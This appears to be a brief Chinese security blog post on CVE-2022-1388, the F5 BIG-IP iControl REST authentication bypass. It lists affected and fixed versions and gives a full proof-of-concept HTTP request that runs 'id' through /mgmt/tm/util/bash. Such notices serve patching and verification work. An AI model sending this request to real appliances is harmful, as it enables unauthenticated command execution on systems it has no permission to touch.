观天

F5 BIG-IP iControl REST命令执行漏洞CVE-2022-1388

该漏洞允许远程未经身份验证的绕过iControl REST ,执行任意命令。

影响版本:

16.1.0 <= BIG-IP 16.x <=   16.1.2
15.1.0 <= BIG-IP 15.x <=   15.1.5
14.1.0 <= BIG-IP 14.x <=   14.1.4
13.1.0 <= BIG-IP 13.x <=   13.1.4
12.1.0 <= BIG-IP 12.x <=   12.1.6
11.6.1 <= BIG-IP 11.x <=   11.6.5
不受影响版本:
BIG-IP 17.0.0
BIG-IP 16.1.2.2
BIG-IP 15.1.5.1
BIG-IP 14.1.4.6
BIG-IP 13.1.5
漏洞验证POC: 验证存在,回显“id”命令执行的结果。
POST /mgmt/tm/util/bash HTTP/1.1
Host: F5地址
Content-Length: 45
Connection: Keep-Alive,X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: a
Content-Type: application/json
Authorization: Basic YWRtaW46aG9yaXpvbjM=

{
"command":"run",
"utilCmdArgs":"-c id"
}

 

 

赞(3)
未经允许不得转载:观天 » F5 BIG-IP iControl REST命令执行漏洞CVE-2022-1388